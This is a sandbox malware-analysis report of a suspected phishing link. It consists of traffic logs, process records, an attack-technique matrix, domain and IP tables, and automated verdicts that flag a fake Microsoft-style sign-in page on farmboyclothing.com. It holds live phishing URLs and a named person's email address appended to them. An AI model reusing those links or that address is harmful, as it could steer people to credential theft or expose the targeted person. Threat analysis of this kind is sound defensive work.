Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49723 version: TLS 1.2
Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49734 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.73.194.208:443 -> 192.168.2.16:49737 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.16:49738 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.126.32.134:443 -> 192.168.2.16:49739 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.73.194.208:443 -> 192.168.2.16:49740 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.73.194.208:443 -> 192.168.2.16:49742 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.73.194.208:443 -> 192.168.2.16:49744 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.73.194.208:443 -> 192.168.2.16:49746 version: TLS 1.2
Source: unknownHTTPS traffic detected: 51.124.78.146:443 -> 192.168.2.16:49747 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.16:49825 version: TLS 1.2
Source: classification engineClassification label: mal52.phis.win@17/51@50/293
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://outbound.knectit.co.uk/u/click?_t=bnBkL3ZkcGpzYnVvcHV0c2pnQW9icGUvenNzYmMwd2ZlL3RzZmxzcHgvNjYxNHNmb3NmeHQvZm9qbmJnM29wbzAwO3RxdXVp
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1940,i,8345449339001585819,190162441382419748,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1940,i,8345449339001585819,190162441382419748,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Registry Run Keys / Startup Folder
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://outbound.knectit.co.uk/u/click?_t=bnBkL3ZkcGpzYnVvcHV0c2pnQW9icGUvenNzYmMwd2ZlL3RzZmxzcHgvNjYxNHNmb3NmeHQvZm9qbmJnM29wbzAwO3RxdXVp0%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
c38-prod.qbomono3prdusw2.iks2.a.intuit.com
44.229.208.61
truefalse
    unknown
    knectit.co.uk
    109.70.148.48
    truefalse
      unknown
      maxcdn.bootstrapcdn.com
      104.18.10.207
      truefalse
        unknown
        outbound.knectit.co.uk
        109.70.148.48
        truefalse
          unknown
          eventbus.a.intuit.com
          54.200.55.78
          truefalse
            unknown
            prd-sb04.apigwsbgprdusw2.iks2.a.intuit.com
            44.240.11.160
            truefalse
              unknown
              static.cns-icn-prod.a.intuit.com
              108.156.60.20
              truefalse
                unknown
                d26p066pn2w0s0.cloudfront.net
                18.239.36.8
                truefalse
                  unknown
                  d296je7bbdd650.cloudfront.net
                  99.86.8.175
                  truefalse
                    unknown
                    code.jquery.com
                    151.101.2.137
                    truefalse
                      unknown
                      cdnjs.cloudflare.com
                      104.17.25.14
                      truefalse
                        unknown
                        farmboyclothing.com
                        188.114.96.3
                        truetrue
                          unknown
                          non2famine.swerner3055.workers.dev
                          172.67.217.253
                          truefalse
                            unknown
                            www.google.com
                            216.58.206.68
                            truefalse
                              unknown
                              smx.intuit.com
                              unknown
                              unknownfalse
                                unknown
                                c38.qbo.intuit.com
                                unknown
                                unknownfalse
                                  unknown
                                  connect.intuit.com
                                  unknown
                                  unknownfalse
                                    unknown
                                    cdn.segment.com
                                    unknown
                                    unknownfalse
                                      unknown
                                      logs-ghexb7h3g8djhjhq.eastus-01.azurewebsites.net
                                      unknown
                                      unknownfalse
                                        unknown
                                        logo.clearbit.com
                                        unknown
                                        unknowntrue
                                          unknown
                                          eventbus.intuit.com
                                          unknown
                                          unknownfalse
                                            unknown
                                            NameMaliciousAntivirus DetectionReputation
                                            https://connect.intuit.com/t/scs-v1-77680828184847679aa6ceba887a2701e0cbde088b7640928428df28d81e1777b790a67867b846368d2937c8c4f4b81c?cta=viewinvoicenow&locale=en_US#barry.doan@firstontariocu.comfalse
                                              unknown
                                              https://farmboyclothing.com/u/click?_t=Cz9tbnVpMD0LP3VxanNkdDA9ISEhIQs8Kn4hISEhISEhIQs8KilpdGJJb0ptamJuRnVmdCEhISEhISEhISEhIQsLPH4hISEhISEhISEhISELfiEhISEhISEhISEhISEhISELPCoxNiEtfiEhISEhISEhISEhISEhISEhISEhCzwqKWVicG1mcy9vcGp1YmRwbS94cGVvanghISEhISEhISEhISEhISEhISEhISEhISELfCE/PiEqKSl1dnBmbmpVdWZ0ISEhISEhISEhISEhISEhISEhISELPG1qYm5mIT4haXRiaS9vcGp1YmRwbS94cGVvanghISEhISEhISEhISEhISEhISEhIQt8ISptamJuZiE+PiIhKjIpaG9qc3V0Y3Z0L2l0Ymkvb3BqdWJkcG0veHBlb2p4IX19IWl0Ymkvb3BqdWJkcG0veHBlb2p4IikhZ2ohISEhISEhISEhISEhISEhCzwjbnBkL3ZkcGpzYnVvcHV0c2pnQW9icGUvenNzYmMjIT4hbWpibmYhdXRvcGQhISEhISEhISEhISEhISEhC3whPz4hKikhPiFpdGJJb0ptamJuRnVmdCF1dG9wZCEhISEhISEhISEhIQt8IT8+ISopIS0oZWZlYnBNdW9mdW9wRE5QRSgpc2ZvZnV0ak11b2Z3RmVlYi91b2ZudmRwZSEhISEhISEhCz8jdXFqc2R0YndiayM+aG9ibSF1cWpzZHQ9ISEhIQs/dXFqc2R0MD0/I3RrL3lmZW9qMGx2L3BkL3VqdWRmb2wwMDt0cXV1aSM+ZHN0IXVxanNkdD0hISEhCz8jMS8yPmZtYmR0Lm1ianVqb2ohLWl1ZWp4LmZkandmZT5pdWVqeCM+dW9mdW9wZCEjdXNwcXhmancjPmZuYm8hYnVmbj0hISEhCz8jOS5HVVYjPnVmdHNiaWQhYnVmbj0hISEhCz9lYmZpPQs/I29mIz5ob2JtIW1udWk9Cz9tbnVpIUZRWlVEUEUiPQs#barry.doan@firstontariocu.comtrue
                                                unknown
                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs
                                                IPDomainCountryFlagASNASN NameMalicious
                                                142.250.186.46
                                                unknownUnited States
                                                15169GOOGLEUSfalse
                                                20.119.0.39
                                                unknownUnited States
                                                8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                104.18.10.207
                                                maxcdn.bootstrapcdn.comUnited States
                                                13335CLOUDFLARENETUSfalse
                                                216.58.206.72
                                                unknownUnited States
                                                15169GOOGLEUSfalse
                                                172.217.18.14
                                                unknownUnited States
                                                15169GOOGLEUSfalse
                                                44.240.11.160
                                                prd-sb04.apigwsbgprdusw2.iks2.a.intuit.comUnited States
                                                16509AMAZON-02USfalse
                                                151.101.130.137
                                                unknownUnited States
                                                54113FASTLYUSfalse
                                                74.125.206.84
                                                unknownUnited States
                                                15169GOOGLEUSfalse
                                                172.67.217.253
                                                non2famine.swerner3055.workers.devUnited States
                                                13335CLOUDFLARENETUSfalse
                                                108.156.60.20
                                                static.cns-icn-prod.a.intuit.comUnited States
                                                16509AMAZON-02USfalse
                                                3.162.38.86
                                                unknownUnited States
                                                16509AMAZON-02USfalse
                                                54.200.55.78
                                                eventbus.a.intuit.comUnited States
                                                16509AMAZON-02USfalse
                                                142.250.186.99
                                                unknownUnited States
                                                15169GOOGLEUSfalse
                                                216.58.212.170
                                                unknownUnited States
                                                15169GOOGLEUSfalse
                                                44.229.208.61
                                                c38-prod.qbomono3prdusw2.iks2.a.intuit.comUnited States
                                                16509AMAZON-02USfalse
                                                172.217.16.202
                                                unknownUnited States
                                                15169GOOGLEUSfalse
                                                1.1.1.1
                                                unknownAustralia
                                                13335CLOUDFLARENETUSfalse
                                                216.58.212.138
                                                unknownUnited States
                                                15169GOOGLEUSfalse
                                                54.69.227.5
                                                unknownUnited States
                                                16509AMAZON-02USfalse
                                                142.250.185.138
                                                unknownUnited States
                                                15169GOOGLEUSfalse
                                                216.58.206.68
                                                www.google.comUnited States
                                                15169GOOGLEUSfalse
                                                23.55.229.208
                                                unknownUnited States
                                                7725COMCAST-7725USfalse
                                                151.101.2.137
                                                code.jquery.comUnited States
                                                54113FASTLYUSfalse
                                                142.250.186.106
                                                unknownUnited States
                                                15169GOOGLEUSfalse
                                                239.255.255.250
                                                unknownReserved
                                                unknownunknownfalse
                                                18.239.36.8
                                                d26p066pn2w0s0.cloudfront.netUnited States
                                                16509AMAZON-02USfalse
                                                23.197.9.160
                                                unknownUnited States
                                                16625AKAMAI-ASUSfalse
                                                188.114.96.3
                                                farmboyclothing.comEuropean Union
                                                13335CLOUDFLARENETUStrue
                                                99.86.8.175
                                                d296je7bbdd650.cloudfront.netUnited States
                                                16509AMAZON-02USfalse
                                                172.217.18.104
                                                unknownUnited States
                                                15169GOOGLEUSfalse
                                                172.217.16.195
                                                unknownUnited States
                                                15169GOOGLEUSfalse
                                                109.70.148.48
                                                knectit.co.ukUnited Kingdom
                                                25369BANDWIDTH-ASGBfalse
                                                104.17.25.14
                                                cdnjs.cloudflare.comUnited States
                                                13335CLOUDFLARENETUSfalse
                                                IP
                                                192.168.2.16
                                                Joe Sandbox version:40.0.0 Tourmaline
                                                Analysis ID:1501324
                                                Start date and time:2024-08-29 18:38:05 +02:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                Sample URL:https://outbound.knectit.co.uk/u/click?_t=bnBkL3ZkcGpzYnVvcHV0c2pnQW9icGUvenNzYmMwd2ZlL3RzZmxzcHgvNjYxNHNmb3NmeHQvZm9qbmJnM29wbzAwO3RxdXVp
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:14
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • EGA enabled
                                                Analysis Mode:stream
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal52.phis.win@17/51@50/293
                                                • Exclude process from analysis (whitelisted): svchost.exe
                                                • Excluded IPs from analysis (whitelisted): 142.250.186.99, 142.250.186.46, 74.125.206.84, 34.104.35.123, 142.250.186.106, 216.58.212.170, 172.217.16.202, 172.217.18.10, 142.250.186.42, 142.250.185.74, 216.58.206.74, 142.250.186.74, 172.217.23.106, 142.250.184.202, 142.250.185.234, 142.250.181.234, 216.58.212.138, 216.58.206.42, 172.217.18.106, 142.250.186.138
                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, content-autofill.googleapis.com, slscr.update.microsoft.com, login.live.com, ajax.googleapis.com, settings-win.data.microsoft.com, clientservices.googleapis.com, clients.l.google.com, fe3cr.delivery.mp.microsoft.com
                                                • Not all processes where analyzed, report is missing behavior information
                                                • VT rate limit hit for: https://outbound.knectit.co.uk/u/click?_t=bnBkL3ZkcGpzYnVvcHV0c2pnQW9icGUvenNzYmMwd2ZlL3RzZmxzcHgvNjYxNHNmb3NmeHQvZm9qbmJnM29wbzAwO3RxdXVp
                                                InputOutput
                                                URL: https://farmboyclothing.com/u/click?_t=Cz9tbnVpMD0LP3VxanNkdDA9ISEhIQs8Kn4hISEhISEhIQs8KilpdGJJb0ptamJuRnVmdCEhISEhISEhISEhIQsLPH4hISEhISEhISEhISELfiEhISEhISEhISEhISEhISELPCoxNiEtfiEhISEhISEhISEhISEhISEhISEhCzwqKWVicG1mcy9vcGp1YmRwbS94cGVvanghISEhISEhISEh Model: jbxai
                                                {
                                                "brand":["Microsoft",
                                                "Webmail",
                                                "Suite"],
                                                "contains_trigger_text":false,
                                                "prominent_button_name":"unknown",
                                                "text_input_field_labels":["Email address",
                                                "Enter email",
                                                "Password",
                                                "Enter Password"],
                                                "pdf_icon_visible":false,
                                                "has_visible_captcha":false,
                                                "has_urgent_text":false,
                                                "has_visible_qrcode":false}
                                                URL: https://farmboyclothing.com/u/click?_t=Cz9tbnVpMD0LP3VxanNkdDA9ISEhIQs8Kn4hISEhISEhIQs8KilpdGJJb0ptamJuRnVmdCEhISEhISEhISEhIQsLPH4hISEhISEhISEhISELfiEhISEhISEhISEhISEhISELPCoxNiEtfiEhISEhISEhISEhISEhISEhISEhCzwqKWVicG1mcy9vcGp1YmRwbS94cGVvanghISEhISEhISEh Model: jbxai
                                                {
                                                "phishing_score":8,
                                                "brand_name":"Document Encryption",
                                                "reasons":"The domain 'farmboyclothing.com' does not match the brand name 'Document Encryption',
                                                 which is a common indicator of phishing attempts. Additionally,
                                                 the presence of a sign-in form and a dark background with white text is a common design choice for login pages,
                                                 which is appropriate for a secure service like document encryption,
                                                 but it's still suspicious given the mismatched domain name."}
                                                URL: https://connect.intuit.com/t/scs-v1-77680828184847679aa6ceba887a2701e0cbde088b7640928428df28d81e1777b790a67867b846368d2937c8c4f4b81c?cta=viewinvoicenow&locale=en_US#barry.doan@firstontariocu.com Model: jbxai
                                                {
                                                "brand":["Intuit"],
                                                "contains_trigger_text":true,
                                                "prominent_button_name":"Pay $5,
                                                064.69",
                                                "text_input_field_labels":["PAYMENT AMOUNT",
                                                "Edit amount",
                                                "Account type",
                                                "personal checking",
                                                "Routing number",
                                                "Confirm account number",
                                                "Account holder's name",
                                                "Save a payment method for faster future payments",
                                                "Sign in or create account"],
                                                "pdf_icon_visible":false,
                                                "has_visible_captcha":false,
                                                "has_urgent_text":false,
                                                "has_visible_qrcode":false}
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Aug 29 15:38:40 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                Category:dropped
                                                Size (bytes):2673
                                                Entropy (8bit):3.9876603537791526
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:0B75035160011586075B4674882E46B8
                                                SHA1:3E80F3299DCB833A19A735F357DF421DE90C990D
                                                SHA-256:99813875715B0BA04EAE10CB59727C4310699F12A059ECB0746BB8E3B95CD86B
                                                SHA-512:AC8223EF1613E7CA620043F77B367F33C3634D81FCEBB68097B44D91D6D68A35F68FE210C98EBD5D8393A026C8434F074D214B2D82100DB1CC27F9261F9F52E1
                                                Malicious:false
                                                Reputation:unknown
